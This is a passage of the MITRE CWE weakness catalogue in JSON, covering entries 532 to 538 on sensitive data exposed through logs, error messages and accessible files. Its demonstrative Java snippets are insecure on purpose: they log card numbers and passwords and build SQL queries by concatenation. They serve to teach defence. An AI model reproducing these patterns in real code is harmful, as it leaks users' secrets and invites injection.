Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Test Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Test Code","attr":{"@_Date":"2020-02-24"}}]}},"532":{"attr":{"@_ID":"532","@_Name":"Insertion of Sensitive Information into Log File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Information written to log files can be of a sensitive nature and give valuable guidance to an attacker or expose sensitive user information.","Extended_Description":{"xhtml:p":["While logging all information may be helpful during development stages, it is important that logging levels be set appropriately before a product ships so that sensitive user data and system information are not accidentally exposed to potential attackers.","Different log files may be produced and stored for:"],"xhtml:ul":{"xhtml:li":["Server log files (e.g. server.log). This can give information on whatever application left the file. Usually this can give full path names and system information, and sometimes usernames and passwords.","log files that are used for debugging",""]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Logging sensitive user data often provides attackers with an additional, less-protected path to acquiring the information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Consider seriously the sensitivity of the information written into log files. Do not write secrets into the log files."},{"Phase":"Distribution","Description":"Remove debug log files before deploying the application into production."},{"Phase":"Operation","Description":"Protect log files against unauthorized read/write."},{"Phase":"Implementation","Description":"Adjust configurations appropriately when software is transitioned from a debug state to production."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following code snippet, a user\'s full name and credit card number are written to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"logger.info(\\"Username: \\" + usernme + \\", CCN: \\" + ccn);"}},{"attr":{"@_Demonstrative_Example_ID":"DX-120"},"Intro_Text":"This code stores location information about the current user:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation());catch (Exception e) {}","xhtml:br":["","","","",""],"xhtml:i":"...","xhtml:div":{"#text":"AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage(\\"Sorry, this application has experienced an error.\\");AlertDialog alert = builder.create();alert.show();Log.e(\\"ExampleActivity\\", \\"Caught exception: \\" + e + \\" While on User:\\" + User.toString());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user\'s location is also written to the log."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-9615","Description":"verbose logging stores admin credentials in a world-readablelog file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9615"},{"Reference":"CVE-2018-1999036","Description":"SSH password for private key stored in build log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999036"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO13-J","Entry_Name":"Do not log sensitive information outside a trust boundary"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"215"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Type"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Fortify Software","Contribution_Date":"2009-07-15","Contribution_Comment":"Portions of Mitigations, Consequences and Description derived from content submitted by Fortify Software."},"Previous_Entry_Name":[{"#text":"Information Leak Through Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Log Files","attr":{"@_Date":"2019-06-20"}},{"#text":"Inclusion of Sensitive Information in Log Files","attr":{"@_Date":"2020-02-24"}}]}},"533":{"attr":{"@_ID":"533","@_Name":"DEPRECATED: Information Exposure Through Server Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level. See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Affected_Resources, Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Server Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Server Log Files","attr":{"@_Date":"2018-03-27"}}]}},"534":{"attr":{"@_ID":"534","@_Name":"DEPRECATED: Information Exposure Through Debug Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level. See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Debug Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Debug Log Files","attr":{"@_Date":"2018-03-27"}}]}},"535":{"attr":{"@_ID":"535","@_Name":"Exposure of Information Through Shell Error Message","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A command shell error message indicates that there exists an unhandled exception in the web application code. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Shell Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Shell Error Message","attr":{"@_Date":"2020-02-24"}}]}},"536":{"attr":{"@_ID":"536","@_Name":"Servlet Runtime Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A servlet error message indicates that there exists an unhandled exception in your web application code and may provide useful information to an attacker.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The error message may contain the location of the file in which the offending function is located. This may disclose the web root\'s absolute path as well as give the attacker the location of application files or configuration information. It may even disclose the portion of code that failed. In many cases, an attacker can use the data to launch further attacks against the system."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following servlet code does not catch runtime exceptions, meaning that if such an exception were to occur, the container may display potentially dangerous information (such as a full stack trace).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");if (username.length() < 10) {}","xhtml:br":["","",""],"xhtml:i":"// May cause unchecked NullPointerException.","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Servlet Runtime Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Servlet Runtime Error Message","attr":{"@_Date":"2020-02-24"}}]}},"537":{"attr":{"@_ID":"537","@_Name":"Java Runtime Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In many cases, an attacker can leverage the conditions that cause unhandled exception errors in order to gain unauthorized access to the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"211","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not expose sensitive error information to the user."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the class InputFileRead enables an input file to be read using a FileReader object. In the constructor of this class a default input file path is set to some directory on the local file system and the method setInputFile must be called to set the name of the input file to be read in the default directory. The method readInputFile will create the FileReader object and will read the contents of the file. If the method setInputFile is not called prior to calling the method readInputFile then the File object will remain null when initializing the FileReader object. A Java RuntimeException will be raised, and an error message will be output to the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class InputFileRead {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private File readFile = null;private FileReader reader = null;private String inputFilePath = null;private final String DEFAULT_FILE_PATH = \\"c:\\\\\\\\somedirectory\\\\\\\\\\";public InputFileRead() {}public void setInputFile(String inputFile) {}public void readInputFile() {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"inputFilePath = DEFAULT_FILE_PATH;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* Assume appropriate validation / encoding is used and privileges / permissions are preserved */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (RuntimeException rex) {} catch (FileNotFoundException ex) {...}","xhtml:div":[{"#text":"reader = new FileReader(readFile);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Error: Cannot open input file in the directory \\" + inputFilePath);System.err.println(\\"Input file has not been set, call setInputFile method before calling readInputFile\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}]}}}},"Body_Text":"However, the error message output to the user contains information regarding the default directory on the local file system. This information can be exploited and may lead to unauthorized access or use of the system. Any Java RuntimeExceptions that are handled should not expose sensitive information to the user."},{"Intro_Text":"In the example below, the BankManagerLoginServlet servlet class will process a login request to determine if a user is authorized to use the BankManager Web service. The doPost method will retrieve the username and password from the servlet request and will determine if the user is authorized. If the user is authorized the servlet will go to the successful login page. Otherwise, the servlet will raise a FailedLoginException and output the failed login message to the error page of the service.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManagerLoginServlet extends HttpServlet {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FailedLoginException ex) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");String password = request.getParameter(\\"password\\");BankManager bankMgr = new BankManager();boolean isAuthentic = bankMgr.authenticateUser(username, password);if (isAuthentic) {}else {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// Get username and password from login page request","// Authenticate user","// If user is authenticated then go to successful login page"],"xhtml:div":[{"#text":"request.setAttribute(\\"login\\", new String(\\"Login Successful.\\"));getServletContext().getRequestDispatcher(\\"/BankManagerServiceLoggedIn.jsp\\"). forward(request, response);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw new FailedLoginException(\\"Failed Login for user \\" + username + \\" with password \\" + password);","xhtml:br":["",""],"xhtml:i":"// Otherwise, raise failed login exception and output unsuccessful login message to error page"}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"request.setAttribute(\\"error\\", new String(\\"Login Error\\"));request.setAttribute(\\"message\\", ex.getMessage());getServletContext().getRequestDispatcher(\\"/ErrorPage.jsp\\").forward(request, response);","xhtml:br":["","","",""],"xhtml:i":"// output failed login message to error page"}}]}}}}}},"Body_Text":"However, the output message generated by the FailedLoginException includes the user-supplied password. Even if the password is erroneous, it is probably close to the correct password. Since it is printed to the user\'s page, anybody who can see the screen display will be able to see the password. Also, if the page is cached, the password might be written to disk."}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Java Runtime Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Java Runtime Error Message","attr":{"@_Date":"2020-02-24"}}]}},"538":{"attr":{"@_ID":"538","@_Name":"Insertion of Sensitive Information into Externally-Accessible File or Directory","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","System Configuration"],"Description":"Do not expose file and directory information to the user."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"95"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 12: Information Leakage." Page 191"}}},"Notes":{"Note":[{"#text":"Depending on usage, this could be a weakness or a category. Further study of all its children is needed, and the entire sub-tree may need to be clarified. The current organization is based primarily on the exposure of sensitive information as a consequence, instead of as a primary weakness.","attr":{"@_Type":"Maintenance"}},{"#text":"There is a close relationship with CWE-552, which is more focused on weaknesses. As a result, it may be more appropriate to convert CWE-538 to a category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Maintenance_Notes, Name"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated 